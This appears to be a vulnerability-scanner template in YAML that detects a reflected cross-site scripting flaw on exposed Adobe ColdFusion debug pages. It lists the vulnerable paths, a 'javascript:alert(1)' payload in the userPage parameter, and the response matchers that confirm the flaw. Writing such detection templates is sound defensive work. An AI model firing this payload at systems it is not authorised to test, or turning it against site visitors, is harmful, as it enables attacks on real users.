id: coldfusion-debug-xss info: name: Adobe ColdFusion Debug Page XSS author: dhiyaneshDK severity: medium description: The remote Adobe ColdFusion debug page has been left open to unauthenticated users, this could allow remote attackers to trigger a reflected cross site scripting against the visitors of the site. reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml tags: adobe,coldfusion,xss requests: - method: GET path: - '{{BaseURL}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)' - '{{BaseURL}}/cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1)' matchers-condition: and matchers: - type: word part: body words: - '"cf_main_cf" src="javascript:alert(1)"' - type: word part: header words: - "text/html" - type: status status: - 200